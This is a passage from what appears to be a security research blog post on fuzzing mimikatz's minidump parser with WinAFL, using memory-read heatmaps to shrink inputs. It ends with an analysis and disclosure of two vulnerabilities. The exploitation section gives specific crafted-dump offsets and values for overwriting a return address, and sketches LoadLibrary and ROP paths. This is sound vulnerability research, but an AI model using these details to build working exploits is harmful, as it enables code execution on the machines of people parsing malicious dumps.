Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb file to add the instrumentation. We can start the instrumented binary and see the adapted status message. Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used task manager to dump the LSASS process), put it into the input directory and start fuzzing. As we can see, we have a file size problem!

THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM

We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall that AFL does deterministic fuzzing before switching to random fuzzing for each queue input. That means it does specific bit and byte flips/additions/removals/… for every (!)
byte/bit in the input! This includes several strategies like bitflip 1/1, bitflip 2/1, …, arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then walks forward 1 bit to flip the next bit, whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 bits and that AFL tries to add interesting values to a value treated as a 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depends on the file size!

Let's assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means that we must execute the target application exactly input-filesize (in bits) times. WinAFL does in-memory fuzzing, which means that we don't have to start the application every time, but let's forget this for now so that our discussion does not get too complicated. Say our input binary has a size of 10 kB. That is 81,920 required executions for the deterministic stage (only for bitflip 1/1!), and AFL conducts many more deterministic strategies. For AFL on Linux this is not a big deal; it's not uncommon to get execution speeds of 1000–8000 executions per second per core (because of the fork server, persistent mode, …). This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores we can easily do this strategy for one input file within a second. Now let's assume that our input has a size of 1 MB (the AFL limit), which means 8,388,608 required executions for bitflip 1/1, that our target application is a little slower because it's bigger and running on Windows (200 exec/sec), and that we just have one core available for fuzzing. Then we need roughly 11.5 hours just to finish bitflip 1/1 for one input entry!
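The arithmetic above is easy to reproduce (10 kB and 1 MB are binary units here):

```python
def bitflip_1_1_executions(file_size_bytes):
    """bitflip 1/1 touches every bit once -> one execution per input bit."""
    return file_size_bytes * 8

def hours_to_finish(file_size_bytes, execs_per_second):
    return bitflip_1_1_executions(file_size_bytes) / execs_per_second / 3600

print(bitflip_1_1_executions(10 * 1024))     # 10 kB -> 81920 executions
print(bitflip_1_1_executions(1024 * 1024))   # 1 MB  -> 8388608 executions
# 8388608 execs at 200 exec/sec on one core: between 11 and 12 hours.
print(hours_to_finish(1024 * 1024, 200))
```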
Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again; it's not uncommon for the queue to grow to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. In our case the input (memory dump) has a size of 27 MB! That would be 216,036,224 required executions only for bitflip 1/1. AFL detects this and directly aborts, because it would just take too long (and AFL would never find vulnerabilities because it's stuck inside deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good because we still have to find the special byte/bit flip which triggers the vulnerability, and the likelihood of hitting it in such a big input file is not very high…. Here is a quote from Michal Zalewski (author of AFL) from the perf_tips.txt document:

"To illustrate, let's say that you're randomly flipping bits in a file, one bit at a time. Let's assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs – not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%."

The key lesson is that input file size is very important during fuzzing! At least as important as the plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don't want to talk about them in this blog post. They shrink files via a fuzzing approach, and since the problem is NP-hard they use heuristics.
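Zalewski's percentages check out: one random single-bit flip hits the one interesting bit with probability 1/(8·size), so over 1,000 independent flips (taking 1 kB as 1024 bytes):

```python
def p_hit(file_size_bytes, execs=1000):
    """Probability that `execs` random single-bit flips hit one specific bit."""
    bits = file_size_bytes * 8
    return 1 - (1 - 1 / bits) ** execs

print(round(p_hit(100) * 100))        # 100 bytes -> 71 (%)
print(round(p_hit(1024) * 100))       # 1 kB      -> 11 (%)
print(round(p_hit(10 * 1024) * 100))  # 10 kB     -> 1 (%)
```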
Tmin is also very slow (execution time depends on the file size…) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex, and I don't want to "waste" time while WinAFL identifies the format. And this is where heatmaps come into play.

PRACTICE: FUZZING AND HEATMAPS

My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern search; however, mimikatz parses and uses lots of structures, and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don't want to have to understand the application in order to write a specific fuzzer; instead we want the fuzzer to learn everything itself. If only we could somehow give the fuzzer the ability to detect the "important input bytes"…

While reading the code I identified something interesting: mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that it reads nearly all required information directly from there (sometimes it also copies data via kull_m_minidump_copy(), but let's not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can reduce the number of required executions drastically! If mimikatz never touches a specific memory region, why should we even fuzz the bytes there? Here is a heat map which I generated based on memory read operations of mimikatz on my 27 MB input file (generated via a plotly Python script): the black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the bottom left of the picture.
I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes, and so on. At this zoom level we do not see access attempts to the start (header) of the memory dump, but this is only because the file size is 27 MB and the smaller red/yellow/white dots are therefore not visible. We can, however, zoom in. The most important message of the above pictures: we do not have to fuzz the bytes from the black area! But we can do even better: we can start fuzzing the white bytes (many read attempts, like offset 0xaa00, which gets read several thousand times), then continue with the yellow bytes (e.g. offset 0x08, which is read several hundred times) and then the red areas (which are read only 1–5 times). This by itself is not a perfect approach (more read attempts also mean a higher likelihood that a mutation makes the input invalid, so starting with the white areas is maybe not the best idea; but since we must do the full deterministic stage anyway, it basically does not matter at which offsets we start. Hint: a better strategy is to also consider the address of the triggering read instruction together with the hit counts).

You are maybe wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script; however, I'm currently developing a more sophisticated script based on dynamic instrumentation frameworks which can extract such information from any application. The use of a debugger script is "stupid" because it's very slow and does not work for every application. However, for mimikatz it worked fine, because mimikatz reads most of the time from the region which is mapped via MapViewOfFile(). My WinAppDbg script is very simple: I just use the API-hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded.
I placed a memory breakpoint on it, and at every breakpoint hit I just log the relative offset and increment the hit counter. You can also extend this script to become more complex (e.g. hook kull_m_memory_search() or kull_m_minidump_copy()). For reference, here is the script: we start mimikatz via the debugger, and as soon as mimikatz finishes (debug.loop() returns), we sort the offsets by hit count and dump them to a log file. This is the code which hooks MapViewOfFile to obtain the base address of our input in memory. This code also adds the memory breakpoint (watch_buffer() method) and invokes memory_breakpoint_callback every time an instruction reads from our input. Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script is to be extended (e.g. to disable the memory breakpoint for search functions), the WinAppDbg source must be modified to return the "bw" variable in the watch_buffer() function. All that is left is the callback function: I used capstone to disassemble the triggering instruction and obtain the size of the read operation, so I can update the offsets correctly. As you can see, there is no magic involved and the script is really simple (at least this one, which only works with mimikatz).

The downside of the debugger memory-breakpoint approach is that it is extremely slow. On my test system this script takes approximately 30 minutes to execute mimikatz once, which is really slow (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another downside is that it does not work for all applications, because applications typically copy input bytes to other buffers and access them there. A more general approach is to write such a script with a dynamic instrumentation framework, which is also much faster (something I'm currently working on).
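The original script is only shown as screenshots, but the bookkeeping it performs is simple. Here is a minimal stand-alone sketch of that bookkeeping; the callback name follows the text, while the simulated access list is made up (the real script gets offset and read size from the memory-breakpoint event and capstone):

```python
from collections import Counter

hits = Counter()  # relative file offset -> number of read accesses

def memory_breakpoint_callback(base, address, read_size):
    """Called for every instruction that reads from the mapped dump:
    credit every byte that the read operation touches."""
    offset = address - base
    for i in range(read_size):
        hits[offset + i] += 1

# Simulated accesses: (absolute address, size), dump mapped at `base`.
base = 0x0A000000
for address, size in [(base + 0x08, 4), (base + 0x08, 4), (base + 0xAA00, 2),
                      (base + 0x08, 4), (base + 0xAA00, 2), (base + 0xAA01, 1)]:
    memory_breakpoint_callback(base, address, size)

# Sort hottest ("white") offsets first -- these are the bytes worth fuzzing.
heatmap = sorted(hits.items(), key=lambda kv: kv[1], reverse=True)
```

Every offset that never appears in `hits` is "black" in the heat map and can be excluded from fuzzing entirely.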
Developing such a script is much harder, because we have to use shadow memory for taint tracking and follow copies of tainted memory (this taint propagation is the complex part, because it requires a correct semantic understanding of the x86 instruction set), while at the same time storing which byte depends on which input byte; all of this should be as fast as possible (for fuzzing) and not consume too much memory (so it's usable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similar solutions, most notably TaintScope (however, no source code or tool is publicly available and it was just a PoC) and VUzzer (based on DataTracker/libdft, which themselves are based on PIN); some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either the source code and the tool are not publicly available, or they are very slow, or they do not work on Windows, or they do not propagate the file offset information (they just mark data as tainted or not tainted), or they are written with PIN, which itself is slower than DynamoRio. I'm developing my own tool to fulfill the above-mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with tmin, which also tries to reduce the input file size; however, it does this via a fuzzing approach which is very slow (and can't handle checksums and file offsets so well).

We can also verify that the black bytes don't matter by just removing them (zeroing them out) from the input file: the above figure shows that the output for both files is exactly the same, therefore the black bytes really don't matter. Now we can start fuzzing with a much smaller input file – only 91 KB instead of 27 MB!
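Conceptually, byte-level taint propagation needs little more than a shadow map from memory addresses to sets of input-file offsets. The toy below illustrates just that bookkeeping (all addresses are made up; a real tool must propagate taint per x86 instruction, not per high-level copy):

```python
# Shadow memory: address -> set of input-file offsets this byte depends on.
shadow = {}

def taint_load(base, size):
    """The input file is mapped at `base`: byte i depends on file offset i."""
    for i in range(size):
        shadow[base + i] = {i}

def taint_copy(dst, src, size):
    """memcpy-style propagation: the destination inherits the source's taint."""
    for i in range(size):
        shadow[dst + i] = set(shadow.get(src + i, set()))

def taint_of_read(addr, size):
    """Which input-file offsets influence a read of [addr, addr+size)?"""
    offsets = set()
    for i in range(size):
        offsets |= shadow.get(addr + i, set())
    return offsets

taint_load(0x1000, 64)          # dump mapped at 0x1000
taint_copy(0x8000, 0x1010, 4)   # the app copies 4 bytes to a heap buffer
# A read of the heap copy still resolves back to file offsets 16..19:
assert taint_of_read(0x8000, 4) == {16, 17, 18, 19}
```

This is why following copies matters: without `taint_copy`, reads from the heap buffer would look like accesses to untainted memory and the corresponding file offsets would wrongly stay "black".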
PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN

I first started a simple fuzzer (not WinAFL), because I first had to modify the WinAFL code to only fuzz the identified bytes. I recommend starting fuzzing as soon as possible with a simple fuzzer, and working on a better version of the fuzzer while it is running. My first fuzzer was a 50 LoC Python script which flipped bytes, invoked mimikatz under WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12-core home system (4 cores reserved for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in code (the 28 crashes are just variations of the same 4 bugs). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours; the second exploitable bug was not found at all with this approach.

I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the "post_handler", which is intended for test-case post-processing (e.g. fixing checksums; however, it's better to remove the checksum verification code from the target application). Since this handler is not called for dry runs (the first executions from AFL), this does not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer. In the input directory I store a file containing only the heatmap bytes, so the file size is much smaller, like 91 KB or 3 KB. Next I added code to write_to_testcase() which copies all bytes from the input file over the heap buffer at the correct positions. Thus AFL only sees the small files, but passes the correct memory dumps to mimikatz. This approach has a little drawback though.
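Mechanically, the byte-splicing in the modified write_to_testcase() amounts to the following Python model (the hot offsets and sizes here are made up for illustration; the real patch is C code inside WinAFL):

```python
# AFL mutates only the small "hot bytes" file; we splice those bytes back
# into the full dump at the offsets recorded by the heatmap before the
# dump is handed to mimikatz.
hot_offsets = [0x08, 0x0C, 0xAA00, 0xAA01]   # illustrative heatmap offsets

def build_testcase(template, small_input, hot_offsets):
    dump = bytearray(template)               # full dump (here: a tiny stand-in)
    for i, offset in enumerate(hot_offsets):
        dump[offset] = small_input[i]        # patch one hot byte each
    return bytes(dump)

template = bytes(0xAB00)                     # zero-filled stand-in dump
mutated  = build_testcase(template, b"\x41\x42\x43\x44", hot_offsets)
assert len(mutated) == len(template)         # AFL never sees the big file
```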
As soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was enough. Later I'm going to invoke the heatmap calculation for every queue entry if a heuristic detects this as more efficient. Please also bear in mind that AFL and WinAFL write every test case to disk. This means we have to write a 27 MB file per execution (even for an in-memory execution like a simple bit flip!). From a performance perspective it would be much better to modify the test case inside the target application in memory (we already do in-memory fuzzing, so this is possible). Then we could also skip all the process switches from WinAFL to the target application and back, and really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even Python code…) into the target application, an area on which I'm also currently working.

Here is a screenshot of my WinAFL output (running on a RAM disk). Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes.

First the good: we already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique coverage; see the green area). Now the bad: the fuzzing speed is only 13 exec/sec (blue), which is extremely slow for AFL (but much faster than the self-written fuzzer, which had 2 exec/sec per core). And now the really bad: we have been running for 14.5 hours and haven't even finished the bitflip 1/1 stage for the first input file yet (and 136 others are in the queue). You can see this in the red area: we have just finished 97% of this stage. And after that, 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing would not be very efficient. For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job.
The new WinAppDbg script reduced the number of "hot bytes" to 3 KB (first we had 27 MB, then 91 KB, and now just 3 KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but instead logs access attempts to the copied memory regions. This WinAppDbg script was approximately 800 LoC (because I have to follow copies which go to heap and stack variables, and I have to disable logging when the variables are freed). Here is a screenshot of the above job (with the "big" 91 KB input files) after 2 days and 7 hours: we can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (98% finished). You can also see that the bitflip 1/1 strategy required 737k executions, and 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1, where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours.

And now the fuzzing of the smaller 3 KB files, after just 2 hours: we already have 30 unique crashes! (Compare this with only 22 crashes after 2 days and 7 hours with the 91 KB file!) We can also see that, for example, the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we found 245 unique paths with just 103k total executions (compared to 184 unique paths with 2.17 million executions for the 91 KB test input). Now consider how long it would have taken to fuzz the full 27 MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size. Here is one more demonstration of the different input file sizes.
The following animated image (created via Veles, https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file. And next the 27 MB minidump file where all unimportant (never read) bytes are replaced with 0x00, so we only see the 3 KB of bytes which we fuzz with WinAFL; you may have to zoom in to see them. Look at the intersection of the 3 coordinate axes.

However, in my opinion even the 3 KB fuzzing job is too slow/inefficient. If we start the job on multiple cores and let it run for one or two weeks, we should get into deeper levels and the results should be OK. But why are we so slow in the first place? Why do we only get an execution speed of 13 or 16 exec/sec? Later queue entries will result in faster execution speeds, because for those inputs mimikatz does not execute the full code (they trigger error conditions), which results in execution speeds like 60 exec/sec. But on Linux we often see execution speeds of several thousand executions per second. A major point is that we have to load and search a 27 MB file with every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups:

WinAFL in syzygy mode: ~13 exec/sec
Native execution without WinAFL and without instrumentation (in-memory): ~335 exec/sec
Execution without WinAFL but with the instrumented (syzygy) binary: ~50 exec/sec
Execution of the native binary (instrumentation via DynamoRio drcov): ~163 exec/sec

So we can see that the syzygy instrumentation results in a slowdown factor of approximately 6, and syzygy+WinAFL a factor of approximately 25. This is mainly because of the process switches and file writes/reads (we are not doing full in-memory fuzzing), but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs.
50 exec/sec), and we can also start WinAFL in DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0.05–2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly, because the DynamoRio mode should be much faster! The reason can be found in our modification of the kuhl_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start, because this is exactly what the "sekurlsa::minidump" command does. What I wanted to achieve is to immediately execute the "sekurlsa::minidump" command and after that the "sekurlsa::logonpasswords" command, and that's why I used this sequence of code calls. However, this is a huge problem, because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) in a state where the input file is still open! This is because we call the kuhl_m_sekurlsa_reset() function at the start of the loop body and not at the end! That means we only perform one "execution" in memory; then WinAFL tries to modify the input file, detects that the file is still open and can't be written to, and terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode, or nudges in DynamoRio mode from afl-fuzz.c:2195) in order to write to the file. Therefore, we do not do real in-memory fuzzing, because we execute the application once and then the application must be closed and restarted to write the next test case. That's why the DynamoRio mode is so slow: the application must be started again for every test case, which means the application must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instruments statically, it's not affected so heavily by this flaw (it still has to restart the application, but does not have to instrument it again).
Let’s fix the problem by reordering kuhl_m_sekurlsa_reset() to the end of the function: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { pMinidumpName = argv[1]; kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); kuhl_m_sekurlsa_reset(); } Return NT_SUCCESS; } If we execute this, we still face the same problem. The reason is a bug inside mimikatz in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls: CreateFile CreateFileMapping MapViewOfFile Therefore, we have to close all these three handles / mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset() case KULL_M_MEMORY_TYPE_PROCESS_DMP: toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump; break; ... } cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem); CloseHandle(toClose); Kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address from (kull_m_minidump_open()): *hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE)); That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which gets never stored). After fixing this issue it starts to work and WinAFL gets 30-50 exec / sec! However, these executions are very inconsistent, sometimes drop down to under 1 execution per second (when the application must be restarted like after crashes). Because of this we got overall better fuzzing performance with the syzygy mode (which now has a speed of ~25 exec / sec) which also uses edge coverage. Screenshot of WinAFL DynamoRio mode (please bear in mind that the default mode is basic block coverage and not edge coverage with DynamoRio): Screenshot of WinAFL syzygy mode: Even if DynamoRio mode has a higher execution speed (29.91 exec / sec vs. 
24.02 exec/sec), it is slower overall because the execution speed is inconsistent. We can see this because the DynamoRio mode has been running for 25 minutes and only reached 13.9k total executions, while the syzygy mode has been running for just 13 minutes but already reached 16.6k executions. So currently it's more efficient to fuzz in syzygy mode if source code is available (especially if the target application crashes very often). Also very important: we had a bug in the code which slowed down the fuzzing process (at least by a factor of 2), and we didn't see it during syzygy fuzzing! (A status-screen entry showing in-memory executions vs. application restarts would be a great feature!) Note that the WinAFL documentation explicitly mentions this in the "How to select a target function" chapter:

Close the input file. This is important because if the input file is not closed WinAFL won't be able to rewrite it.
Return normally (so that WinAFL can "catch" this return and redirect execution; "returning" via ExitProcess() and such won't work).

The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and lose the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16,600 executions), and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode (because of the dynamic instrumentation), and then it's better to use the syzygy mode. Note that we could "fix" this by storing the stack pointer in the pre-fuzzing handler of DynamoRio and implementing a crash handler which restores the stack and instruction pointer, frees the file mappings and handles, and just continues fuzzing as if nothing had happened. Memory leaks can also be handled by hooking and replacing the heap implementation to free all allocations made in the fuzzing loop.
Only global variables could become a problem, but that discussion goes too far here. In the end I started a fuzzing job in syzygy mode, with one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing), and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant; however, two crashes are critical.

PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES

Vulnerability 1: Arbitrary partial relative stack overwrites

In this chapter I only want to describe the two critical crashes in depth. After fuzzing I had several unique crashes (based on the call stack of the crash) which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one I thought most likely to be exploitable) and analysed it. Here are the exact steps.

This is the code with the vulnerability: the variable "myDir" is completely under our control. myDir points into our memory dump; we can therefore control the entire content of this struct. You may want to find the problem yourself before continuing; here are some hints:

The argument "length" is always 0x40 (64), which is exactly the length of the destination argument buffer.
The argument "source" is also under our full control.
Obviously we want to reach the RtlCopyMemory() in line 29 with some malicious arguments.

Now try to think about how we can exploit this. My thoughts, step by step: I want to reach line 29 (RtlCopyMemory()), and therefore the IF statement from lines 9-13 must evaluate to true. We can exploit the situation if "lengthToRead" (the size argument of the RtlCopyMemory call) is bigger than 0x40, or if "offsetToWrite" is bigger than 0x40. The second case would be better for us, because such relative writes are extremely powerful (e.g. partially overwriting return addresses to bypass ASLR, or skipping stack cookies, and so on).
So I decided to try exactly this: somehow control "offsetToWrite", which is only set in lines 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to reach line 18, the IF statement in line 15 must evaluate to true.

First condition: source < memory64→StartOfMemoryRange

This is no problem, because we completely control both values. So far, so simple. Now let's check the first IF statement (lines 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Let's focus on line 12: from the IF in line 15 we know that source < memory64→StartOfMemoryRange must be true, which is exactly what the first check here tests, so this one is true. That means we only have to satisfy the second check:

Second condition: source + length > (memory64→StartOfMemoryRange + memory64→DataSize)

I leave this condition aside for a moment and think about lines 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible relative to an address, to deal with ASLR), the source address (to point into my own buffer) and the size – that would really be great. The size is exactly "lengthToRead", and this variable can be set via lines 25 and 27. Line 25 would be a bad choice, because "length" is fixed and "offsetToWrite" is already "used" to control the target address. So we must reach line 27. "offsetToRead" is always zero because of line 17, and therefore memory64→DataSize completely controls "lengthToRead". Now we can fix the next value and say that we want memory64→DataSize to always be 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready to take the second condition and fill in the known values.
What we get is: Second condition: Source + 0x40 > (memory64→StartOfMemoryRange + 1). This check (together with the first condition) is exactly the check which should ensure that DataSize (the number of bytes we write) stays within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64→StartOfMemoryRange to 0xffffffffffffffff, and we survive the check because after adding one to it we get zero, which means Source + 0x40 is always bigger than zero (as long as Source + 0x40 does not itself overflow). At the same time we survive the first condition because Source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18: offsetToWrite = 0xffffffffffffffff – source. You might think that we can't fully control offsetToWrite because the source variable on x86 mimikatz is just 32-bit (while the 0xffff... value is 64-bit); however, because of integer truncation the upper 32 bits are removed, and therefore we can really address any byte in the address space relative to the destination buffer (on x64 mimikatz it's 64-bit, so there is no problem either). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), and we have full control over the size of the write operation and full control over the values! The code can also be triggered multiple times (the loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is which offset to use. Since we write relative to a stack variable, we are going to target a return address. The destination variable is passed as an argument inside the kull_m_process_ntheaders() function, and this is exactly where we place a breakpoint on the first kull_m_memory_copy() call. Then we can extract the "destination" argument address and the address where the return address is stored, and subtract them.
What we get is the required offset to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems very likely require different offsets). Offset 0x6B4 stores the "source" variable. I use 0xffffff9c here because this is exactly the correct offset from "destination" to "return address" on the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; however, this offset should also work for older versions!). Offset 0xF0 stores the "myDir" struct content. The first 8 bytes store the NumberOfMemoryRanges (this controls the number of loop iterations and therefore how often we can write). Since we just want to demonstrate the vulnerability, we set it to one to make exactly one write operation (overwrite the return address). The next 8 bytes are the BaseRVA. This value controls "ptr" in line 6, which is the source from where we copy. So we store there the relative offset in our dump file at which we place the new return address (which should overwrite the original one). I'm using the value 0x90 here, but we can use any value; it's only important that we then store the new return address at that offset (in my case offset 0x90). I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the "StartOfMemoryRange" variable. I originally used 0xffffffffffffffff (like in the above example); however, for demonstration purposes I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize, check the second condition in line 12). The next 8 bytes control the "DataSize" and, as already explained, I set this to 4 to write 4 bytes. Here is the file: Hint: in the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20) we can see that this is the offset of the "streams" directory. Therefore, the above minidump has a streams directory starting at offset 0x20.
Every entry there consists of 3 DWORDs (on x86); the first is the type and the last is the offset. We search for the entry with type 0x09 (= Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there, we can see that it is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file, you may want to patch it first. And here is the proof that we really have control over the return address: Please note that full exploitation is still tricky because we have to find a way around ASLR. Because of DEP our data is marked as non-executable, so we can't jump into shellcode. The default bypass technique is ROP, which means we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. Here is what we can do with the above vulnerability: We can make a relative write on the stack, which means we can overwrite the return address (or arguments, or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next, we can choose the size of the write operation, which means we can make a partial overwrite. We can therefore overwrite only the two lower bytes of the return address, which means we can bypass module-level ASLR (these two properties make the vulnerability so useful). We can check which ranges we can reach by inspecting the call stack leading to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite), and we have multiple paths to the vulnerable code (and therefore different call stacks with different ranges; we can even create more call stacks by overwriting a return address with an address which creates another call stack to the vulnerable code). For example, a simple exploit could be to overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g.
0x455DF3, which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen so that the function argument is a pointer to the stack, because then we can use the vulnerability to write the target path (a UNC path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system, which later gets loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments of the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) into the memory dump buffer. After that, these bytes can be written back to the stack (with the vulnerability), and full ROP chains can be built because we can now write ROP gadget addresses one after another. Without this trick we cannot execute multiple ROP gadgets in sequence, because return addresses are not stored adjacent on the stack (there is other memory in between, like arguments, local variables and so on). However, I believe that this exploitation scenario is much more difficult because it requires multiple writes (which must be ordered to survive all checks in the mimikatz code), so the first approach with LoadLibrary should be simpler to implement.

Vulnerability 2: Heap overflow

The major cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length of bytes the string can hold, and the length (currently stored characters). The content is completely under attacker control because it is parsed from the minidump. Moreover, the source (the second argument) also points into the minidump (attacker controlled).
Mimikatz always extracts the string structure from the minidump and then calls kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes and after that copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length, and string->Length can therefore be bigger than string->MaximumLength because this value is also retrieved from the minidump. If later code uses string->Length, a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump: mimikatz then uses the string as input (and output) of the decryption function in kuhl_m_sekurlsa_nt6_LsaEncryptMemory(), and the manipulated length value leads to a heap overflow (the MSV1.0 execution path is not trivial/possible to exploit in my opinion, but there are many other paths which use kull_m_process_getUnicodeString()).

Vulnerability patch status

At the time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author on 2017-08-26 about the problems and received a very friendly answer on 2017-08-28, saying that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and that it could be made more secure by using a higher-level language, with which I totally agree. On 2017-08-28 I sent the S/MIME-encrypted vulnerability details (together with this blog post). Since I didn't receive answers to further emails or Twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant using mimikatz in minidump mode, make sure to only use it inside a dedicated mimikatz virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway).
To further mitigate the risk (e.g. a VM escape) I recommend fixing the above-mentioned vulnerabilities.

THEORY: RECOMMENDED FUZZING WORKFLOW

